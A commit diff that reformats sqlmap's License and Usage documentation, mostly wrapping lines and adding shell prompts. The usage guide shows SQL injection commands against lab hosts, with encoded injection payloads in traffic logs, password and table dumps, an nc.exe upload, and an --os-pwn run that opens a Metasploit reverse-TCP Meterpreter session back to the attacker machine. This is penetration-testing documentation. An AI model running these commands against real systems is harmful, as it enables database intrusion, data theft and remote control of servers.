First update of README

License.md

@@ -1,6 +1,6 @@
 # License
 
-sqlmap is (C) 2006-2015 [Bernardo Damele Assumpcao Guimaraes](mailto:bernardo@sqlmap.org), [Miroslav Stampar](mailto:miroslav@sqlmap.org).
+sqlmap is (C) 2006-2016 [Bernardo Damele Assumpcao Guimaraes](mailto:bernardo@sqlmap.org), [Miroslav Stampar](mailto:miroslav@sqlmap.org).
 
 This program is free software; you may redistribute and/or modify it under the terms of the [GNU General Public License](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html) as published by the [Free Software Foundation](http://www.fsf.org); Version 2 (or later) with the clarifications and exceptions described in the [license file](https://raw.github.com/sqlmapproject/sqlmap/master/doc/COPYING). This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses
 (contact [sales@sqlmap.org](sales@sqlmap.org)).

Usage.md

@@ -1,5 +1,6 @@
 # Usage
 
+```
 Usage: python sqlmap.py [options]
 
 Options:
@@ -52,7 +53,8 @@
     --skip-urlencode    Skip URL encoding of payload data
     --force-ssl         Force usage of SSL/HTTPS
     --hpp               Use HTTP parameter pollution
-        --eval=EVALCODE     Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")
+    --eval=EVALCODE     Evaluate provided Python code before the request (e.g. "impo
+rt hashlib;id2=hashlib.md5(id).hexdigest()")
 
 Optimization:
     These options can be used to optimize the performance of sqlmap
@@ -64,7 +66,8 @@
     --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
 
 Injection:
-        These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts
+    These options can be used to specify which parameters to test for, provide custo
+m injection payloads and optional tampering scripts
 
     -p TESTPARAMETER    Testable parameter(s)
     --skip=SKIP         Skip testing for given parameter(s)
@@ -106,7 +109,9 @@
     -f, --fingerprint   Perform an extensive DBMS version fingerprint
 
 Enumeration:
-        These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements
+    These options can be used to enumerate the back-end database management system i
+nformation, structure and data contained in the tables. Moreover you can run your ow
+n SQL statements
 
     -a, --all           Retrieve everything
     -b, --banner        Retrieve DBMS banner
@@ -152,14 +157,16 @@
     --shared-lib=SHLIB  Local path of the shared library
 
 File system access:
-        These options can be used to access the back-end database management system underlying file system
+    These options can be used to access the back-end database management system unde
+rlying file system
 
     --file-read=RFILE   Read a file from the back-end DBMS file system
     --file-write=WFILE  Write a local file on the back-end DBMS file system
     --file-dest=DFILE   Back-end DBMS absolute filepath to write to
 
 Operating system access:
-        These options can be used to access the back-end database management system underlying operating system
+    These options can be used to access the back-end database management system unde
+rlying operating system
 
     --os-cmd=OSCMD      Execute an operating system command
     --os-shell          Prompt for an interactive operating system shell
@@ -171,7 +178,8 @@
     --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
 Windows registry access:
-        These options can be used to access the back-end database management system Windows registry
+    These options can be used to access the back-end database management system Wind
+ows registry
 
     --reg-read          Read a Windows registry key value
     --reg-add           Write a Windows registry key value data
@@ -220,6 +228,7 @@
     --purge-output      Safely remove all content from output directory
     --smart             Conduct through tests only if positive heuristic(s)
     --wizard            Simple wizard interface for beginner users
+```
 
 ## Output verbosity
 
@@ -253,7 +262,8 @@ Run sqlmap against a single database instance. This option accepts a connection
 
 For example:
 
-    python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
+    $ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner -\
+    -dbs --users
 
 ### Target URL
 
@@ -265,7 +275,7 @@ Run sqlmap against a single target URL. This option requires a target URL in fol
 
 For example:
 
-    python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
+    $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
 
 ### Parse targets from Burp or WebScarab proxy logs
 
@@ -313,7 +323,7 @@ This option makes sqlmap negotiate with the search engine its session cookie to
 
 For example:
 
-    python sqlmap.py -g "inurl:\".php?id=1\""
+    $ python sqlmap.py -g "inurl:\".php?id=1\""
 
 ### Load options from a configuration INI file
 
@@ -335,7 +345,8 @@ By default the HTTP method used to perform HTTP requests is `GET`, but you can i
 
 For example:
 
-    python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
+    $ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --\
+    dbs --users
 
 ### Parameter splitting character
 
@@ -345,7 +356,8 @@ There are cases when default parameter delimiter (e.g. `&` in GET and POST data)
 
 For example:
 
-    python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users
+    $ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" \
+    --param-del=";" -f --banner --dbs --users
 
 ### HTTP `Cookie` header
 
@@ -417,10 +429,33 @@ It is possible to provide extra HTTP headers by setting the option `--headers`.
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z "ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z "ign\
+    ,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
     [...]
     [xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
-    GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1
+    GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20COUNT%
+    28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    3D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+    20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6c666d3a%2CFLOOR%28RAN
+    D%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%
+    29 HTTP/1.1
     Host: www.target.com
     Accept-encoding: gzip,deflate
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@@ -541,7 +576,8 @@ In case that user wants to change (or add new) parameter values, most probably b
 
 For example:
 
-    python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
+    $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dc\
+    c509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
 
 Each request of such run will re-evaluate value of GET parameter `hash` to contain a fresh MD5 hash digest for current value of parameter `id`.
 
@@ -915,7 +951,7 @@ Example against an Oracle target:
     $ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --banner
     
     [...]
-    [21:50:11] [INFO] fetching banner
+    [xx:xx:11] [INFO] fetching banner
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS: Oracle
     banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
@@ -943,8 +979,8 @@ Example against a MySQL target:
     $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --hostname
     
     [...]
-    [21:44:04] [INFO] fetching server hostname
+    [xx:xx:04] [INFO] fetching server hostname
-    [21:44:04] [INFO] retrieved: debian-5.0-i386
+    [xx:xx:04] [INFO] retrieved: debian-5.0-i386
     hostname:    'debian-5.0-i386'
 
 ### Detect whether or not the session user is a database administrator
@@ -967,7 +1003,8 @@ When the session user has read access to the system table containing information
 
 Example against a PostgreSQL target:
 
-    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
+    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --pass\
+    words -v 1
 
     [...]
     back-end DBMS: PostgreSQL
@@ -1071,7 +1108,8 @@ User can retrieve a DBMS schema by using this switch. Schema listing will contai
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs
+    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema\
+    --batch --exclude-sysdbs
 
     [...]
     Database: owasp10
@@ -1132,7 +1170,8 @@ In case that user wants just to know the number of entries in table(s) prior to
 
 Example against a Microsoft SQL Server target:
 
-    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
+    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --c\
+    ount -D testdb
     [...]
     Database: testdb
     +----------------+---------+
@@ -1152,7 +1191,8 @@ This functionality depends on option `-T` to specify the table name and optional
 
 Example against a Firebird target:
 
-    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
+    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --d\
+    ump -T users
     [...]
     Database: Firebird_masterdb
     Table: USERS
@@ -1212,27 +1252,28 @@ If the query is a `SELECT` statement, sqlmap will retrieve its output. Otherwise
 
 Examples against a Microsoft SQL Server 2000 target:
 
-    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-\
-    "SELECT 'foo'" -v 1
+    query "SELECT 'foo'" -v 1
 
     [...]
     [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
     [hh:mm:14] [INFO] retrieved: foo
     SELECT 'foo':    'foo'
 
-    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-\
-    "SELECT 'foo', 'bar'" -v 2
+    query "SELECT 'foo', 'bar'" -v 2
 
     [...]
     [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
-    [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into 
+    [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpa
-    distinct queries to be able to retrieve the output even if we are going blind
+    ck it into distinct queries to be able to retrieve the output even if we are going b
-    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
+    lind
-    (CHAR(32)))
+    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARC
+    HAR(8000)), (CHAR(32)))
     [hh:mm:50] [INFO] retrieved: foo
     [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
-    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
+    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHA
-    (CHAR(32)))
+    R(8000)), (CHAR(32)))
     [hh:mm:50] [INFO] retrieved: bar
     [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
     SELECT 'foo', 'bar':    'foo, bar'
@@ -1278,7 +1319,8 @@ Example against a MySQL 4.1 target:
     back-end DBMS: MySQL < 5.0.0
     banner:    '4.1.21-community-nt'
 
-    [hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
+    [hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/co
+    mmon-tables.txt'
     [hh:mm:40] [INFO] adding words used on web page to the check list
     please enter number of threads? [Enter for 1 (current)] 8
     [hh:mm:43] [INFO] retrieved: users
@@ -1371,8 +1413,8 @@ Example against a MySQL target to upload a binary UPX-compressed file:
     $ ls -l /software/nc.exe.packed
     -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
 
-    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file
-    "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
+    -write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
 
     [...]
     [hh:mm:29] [INFO] the back-end DBMS is MySQL
@@ -1457,8 +1499,8 @@ slide deck [Expanding the control over the operating system from the database](h
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn \
+    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1"
-    --msf-path /software/metasploit
+    --os-pwn --msf-path /software/metasploit
 
     [...]
     [hh:mm:31] [INFO] the back-end DBMS is MySQL
@@ -1483,15 +1525,16 @@ Example against a MySQL target:
     [hh:mm:33] [INFO] retrieving MySQL base directory absolute path
     [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
     [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
-    how do you want to execute the Metasploit shellcode on the back-end database underlying 
+    how do you want to execute the Metasploit shellcode on the back-end database underly
-    operating system?
+    ing operating system?
     [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
     [2] Stand-alone payload stager (file system way)
     > 
     [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
     which connection type do you want to use?
     [1] Reverse TCP: Connect back from the database host to this machine (default)
-    [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+    [2] Reverse TCP: Try to connect back from the database host to this machine, on all 
+    ports 
     between the specified and 65535
     [3] Bind TCP: Listen on the database host for a connection
     > 
@@ -1503,7 +1546,8 @@ Example against a MySQL target:
     [3] VNC
     > 
     [hh:mm:40] [INFO] creation in progress ... done
-    [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
+    [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, pleas
+    e wait..
 
                                     _
                                     | |      o
@@ -1525,11 +1569,11 @@ Example against a MySQL target:
     LHOST => 192.168.136.1
     [*] Started reverse handler on 192.168.136.1:60641 
     [*] Starting the payload handler...
-    [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', 
+    [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_binev
-    please wait..
+    al', please wait..
     [*] Sending stage (749056 bytes) to 192.168.136.129
-    [*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 
+    [*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mo
-    hh:mm:52 +0100 2011
+    n Apr 11 hh:mm:52 +0100 2011
 
     meterpreter > Loading extension espia...success.
     meterpreter > Loading extension incognito...success.
@@ -1596,8 +1640,9 @@ With `--reg-key` option you specify used Windows registry key path, with `--reg-
 
 A sample command line for adding a registry key hive follows:
 
-    $ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \ 
+    $ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-a\
-    --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
+    dd --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_S\
+    Z --reg-data=1
 
 ## General
 
@@ -1675,7 +1720,8 @@ It is possible to calculate and show in real time the estimated time of arrival
 
 Example against an Oracle target affected only by boolean-based blind SQL injection:
 
-    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
+    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" \
+    -b --eta
 
     [...]
     [hh:mm:01] [INFO] the back-end DBMS is Oracle
@@ -1687,7 +1733,8 @@ Example against an Oracle target affected only by boolean-based blind SQL inject
 Then:
 
     100% [===================================================] 64/64
-    [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
+    [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1
+    .0 - Prod
 
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS: Oracle
@@ -1725,12 +1772,21 @@ In lost of cases retrieval of non-ASCII data requires special needs. One solutio
 
 Example against a PostgreSQL target:
 
-    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
+    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banne\
+    r --hex -v 3 --parse-errors
 
     [...]
     [xx:xx:14] [INFO] fetching banner
-    [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
+    [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58)
-    [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
+    )||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR
+    (85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR
+    (110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
+    [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>fun
+    ction.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":
+    vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c2063
+    6f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d3
+    12e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35
+    </b>'
     [xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
     GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
     [...]
@@ -1751,17 +1807,26 @@ This is useful for debugging purposes like understanding why a certain enumerati
 
 Example against a Microsoft SQL Server target:
 
-    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
+    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --p\
+    arse-errors
     [...]
-    [xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
+    [xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time
-    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
+    needed to find the right number of query columns. Automatically extending the range
-    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
+    for current UNION query injection technique test
+    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers 
+    (0x80040E14)
+    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is ou
+    t of range of the number of items in the select list.
     <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
-    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
+    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers 
-    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
+    (0x80040E14)
+    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out
+    of range of the number of items in the select list.
     <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
-    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
+    [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers 
-    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
+    (0x80040E14)
+    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out
+    of range of the number of items in the select list.
     <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
     [xx:xx:17] [INFO] target URL appears to have 3 columns in query
     [...]
@@ -1802,19 +1867,22 @@ Each option and switch can be written in a shorter mnemonic form using option `-
 
 Example:
 
-    python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
+    $ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.ta\
+    rget.com/vuln.php?id=1"
 
 can be written (one of many ways) in shorter mnemonic form like:
 
-    python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
+    $ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
 
 Another example:
 
-    python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
+    $ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T\
+    users -u "www.target.com/vuln.php?id=1"
 
 can be written in shorter mnemonic form like:
 
-    python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
+    $ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/\
+    vuln.php?id=1"
 
 ### Alerting on successful SQL injection detection
 
@@ -1828,11 +1896,14 @@ In case that user wants to automatically set up answers for questions, even if `
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
+    $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--techni\
+    que=E --answers="extending=N" --batch
     [...]
     [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
-    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want
-    [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
+    to skip test payloads specific for other DBMSes? [Y/n] Y
+    [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided le
+    vel (1) and risk (1)? [Y/n] N
     [...]
 
 ### Make a beep sound when SQL injection is found
@@ -1885,33 +1956,50 @@ sqlmap can try to identify backend WAF/IPS/IDS protection (if any) so user could
 
 Example against a MySQL target protected by the ModSecurity WAF:
 
-    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --ident\
+    ify-waf -v 3
     [...]
     [xx:xx:23] [INFO] testing connection to the target URL
     [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
     [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
+    Security Providers)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firew
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
+    all (BinarySEC)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Fi
+    rewall (NetContinuum/Barracuda Networks)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Fire
+    wall (art of defence Inc.)'
